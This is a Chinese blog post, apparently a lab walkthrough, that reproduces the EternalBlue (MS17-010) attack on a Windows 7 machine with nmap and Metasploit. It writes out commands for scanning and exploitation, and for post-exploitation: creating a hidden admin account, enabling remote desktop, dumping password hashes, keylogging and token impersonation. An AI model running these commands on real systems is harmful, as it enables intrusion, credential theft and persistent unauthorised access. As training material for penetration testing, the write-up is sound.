Win7经典漏洞永恒之蓝复现

已于 2022-10-21 08:30:35 修改
阅读量2.6k 收藏 40
点赞数 3
文章标签: 网络 安全 windows
于 2022-10-20 17:47:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42808240/article/details/127431571
版权

Win7经典漏洞永恒之蓝复现

环境

工具:metaspoilt

模拟攻击机ip:192.168.2.19

靶机ip:192.168.2.22

信息收集

扫描靶机端口及端口服务版本

nmap -sV 192.168.2.22

在这里插入图片描述445端口开启且版本信息已经显示时windows7版本,永恒之蓝漏洞特征已非常明显

确定漏洞

启动metaspoilt
在这里插入图片描述搜索ms17-010

search ms17-010

在这里插入图片描述
exploit/windows/smb/ms17_010_eternalblue 为攻击模块

auxiliary/scanner/smb/smb_ms17_010 为辅助模块可以扫描目标是否存在永恒之蓝漏洞

进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

查看参数

show options

![在这里插入在这里插入图片描述
RHOSTS参数是必填项,参数为目标ip

set RHOSTS 192.168.2.22

运行

exploit

在这里插入图片描述运行结果

在这里插入图片描述确定有永恒之蓝漏洞

渗透

使用ms17-010攻击模块

use exploit/windows/smb/ms17_010_eternalblue

查看参数

show options

在这里插入图片描述主要参数有

RHOSTS:目标主机ip

LHOST:攻击者ip (程序检测到网卡的ip已自动填写)

LPORT:攻击接收端口(默认为4444,可根据需要更改)

set RHOSTS 192.168.2.22

开始渗透

exploit

在这里插入图片描述渗透成功

渗透成功后一些常用操作

通过Shell对靶机Win7进行控制
创建用户名密码
net user hack 123456 /add
将用户hack添加入管理组
net localgroup administrators hack /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.2.22

shell交互显示乱码是因为编码不同

chcp 65001

修改编码可解决

获取到session后的常用命令:

help #获取所有可用命令

getuid #获取当前权限

screenshot #截屏

hashdump #获取密码的hash

ps #获取进程列表

sysinfo #获取系统信息

route #获取路由表

getpid #获取当前攻入的进程pid

migrate #将当前后门注入迁移到其他程序

keyscan_start # 开启键盘记录

keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

download/upload #上传下载文件

keyscan_stop # 监视键盘记录

bg # 回到metasploit界面

令牌操纵
use incognito #heip incognito 查看帮助

list_tokens -u 查看可用的token

impersonate_token “伪造的身份” #假冒token 或者

举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell

烈火寻真我
关注
  • 3
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
ms17_010(永恒之蓝漏洞复现详细教程
zxcvbnmasdflzl的博客
06-25 572
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块(强大到想流泪的功能模块))。首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意思)。
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
MS17-010---利用“永恒之蓝漏洞攻击 win7主机
最新发布
金灰的博客
04-29 1099
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2791
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1742
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
利用windows 7 cve-2019-0708漏洞
pan0308005的博客
12-27 750
利用Windows 7 CVE-2019-0708漏洞的实验验证了此漏洞的存在,并成功地执行了恶意代码,获取了系统控制权。或者使用现成的漏洞利用脚本进行攻击实验。4. 实验结果:通过实验验证漏洞漏洞存在,并成功执行恶意代码,进而获取系统控制权。逻辑错误漏洞:由于设计或实现上的逻辑错误,导致程序执行中存在漏洞,攻击者可以通过利用这些漏洞来绕过安全机制或达到非法操作的目的。缓冲区溢出漏洞:程序在处理输入时未能正确验证输入的大小,导致溢出写入到相邻的内存空间中,从而改变程序的执行流或覆盖重要数据。
网络安全-MS17-010漏洞-永恒之蓝
weixin_48137911的博客
02-14 3685
攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装。这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了。账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的。.无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~
使用永恒之蓝(MS17-010)漏洞入侵windows7
weixin_34303897的博客
07-02 1192
永恒之蓝简介 前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
漏洞复现是什么如何复现.txt
01-31
漏洞复现
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3861
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
MS17-010“永恒之蓝漏洞复现与分析
m0_74887243的博客
01-15 480
MS17-010“永恒之蓝漏洞复现
永恒之蓝漏洞复现
m0_75178803的博客
06-11 414
(控制面板——编辑组——管理工具编辑组策略——本地计算机策略——计算机配置——windows设置——安全设置——本地策略——安全选项)终端输入nmap -sP 对在192.168.75.xxx网段下的所有电脑进行简单的ping扫描(不进行端口扫描)终端输入nmap -p,通过扫描端口,用端口的是否启用来获取靶机ip。创建新的管理员账户,账户名123,密码123(在shell控制台下)查看目标靶机的本地用户(在目标主机的shell控制台下)获取靶机的本地用户的密码(在meterpreter下)
ms17-010(永恒之蓝漏洞复现)
Martin-share的博客
02-13 674
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers (影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows 系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。黑客利用永恒之蓝工具成功利用漏洞攻击电脑获取系统最高权限后执行勒索病毒程序。(自动化)
MS17-010永恒之蓝复现与利用
kriesa的博客
07-13 769
MS17-010永恒之蓝复现与利用
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
学习永恒之蓝复现的收获
09-01
学习永恒之蓝复现的收获包括以下几点: 首先,在复现过程中,你可以学习到如何利用已有的工具,例如Kali上的工具,来进行复现。这些工具已经为复现做好了准备,帮助你更好地理解攻击的过程和原理,并加深对Kali的使用。 其次,你还可以通过学习永恒之蓝漏洞的利用过程,了解到具体的漏洞利用方法和技巧。永恒之蓝是一种由美国国家安全局开发的漏洞利用程序,针对微软漏洞编号ms17-010。通过学习这个漏洞的利用工具,你可以更深入地了解TCP 445端口(文件分享协议)的攻击方式,以及如何传播病毒木马。 最后,学习永恒之蓝复现还可以帮助你加深对渗透攻击的理解。在复现过程中,你可能会接触到一些以前没见过的命令和技术,这有助于扩展你的知识面,并提升你在渗透测试领域的技能水平。 综上所述,学习永恒之蓝复现的收获包括对Kali工具的深入理解和熟练使用,对漏洞利用方法和技巧的学习,以及对渗透攻击的更深入理解和技能提升。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_54584489/article/details/122374341)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值